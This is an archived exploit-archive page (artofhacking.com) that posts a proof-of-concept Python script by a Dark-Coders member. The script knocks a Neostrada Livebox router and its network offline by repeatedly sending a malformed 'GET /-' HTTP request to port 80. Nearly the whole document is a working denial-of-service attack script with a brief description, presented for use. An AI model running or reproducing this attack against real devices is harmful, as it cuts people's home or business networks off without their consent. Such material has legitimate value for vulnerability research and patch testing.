AOH :: HP Unsorted N :: VA2016.HTM

Neostrada Livebox Remote Network Down PoC Exploit



Neostrada Livebox Remote Network Down PoC Exploit
Neostrada Livebox Remote Network Down PoC Exploit



# Neostrada Livebox Router Remote Network Down PoC Exploit
# Author: 0in aka zer0in from Dark-Coders Group!
# Contact: 0in.email(at)gmail.com / 0in(at)dark-coders.pl
# Site: http://dark-coders.pl 
# Greetings to: All Dark-Coders Members: die,doctor,m4r1usz,sun8hclf ;*
#               Friends: cOndemned,joker,chomzee,TBH
#               IRC: #dark-coders & #pvt
# Description:
#       When we send a "specially crafted http packet" x ~25
#       Livebox HTTP service && all network goes down
# Simple PoC source:
#!/usr/bin/python

from socket import *
import os
import sys
target = "192.168.1.1"
def to_vuln(ip):
        suck = socket(AF_INET,SOCK_STREAM,0)
        try:
                conn = suck.connect((ip,80))
        except Exception:
                check(ip)
        return suck
def check(ip):
        print "[+] No HTTP response..."
        print "[+] Server and network should go down!"
        print "[+] Check it with ping..."
        os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!]              [HTTP DoS vuln]           "
print "[!]      by 0in [0in.email(at)gmail.com]           "
print "\n[+] Dosing..."
for i in range(256):
        pack3t = "GET /- HTTP/1.1\r\n\r\n"
        POC = to_vuln(target)
        POC.send(pack3t)
        try:
                POC.recv(512)
        except Exception:
                check(target)

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.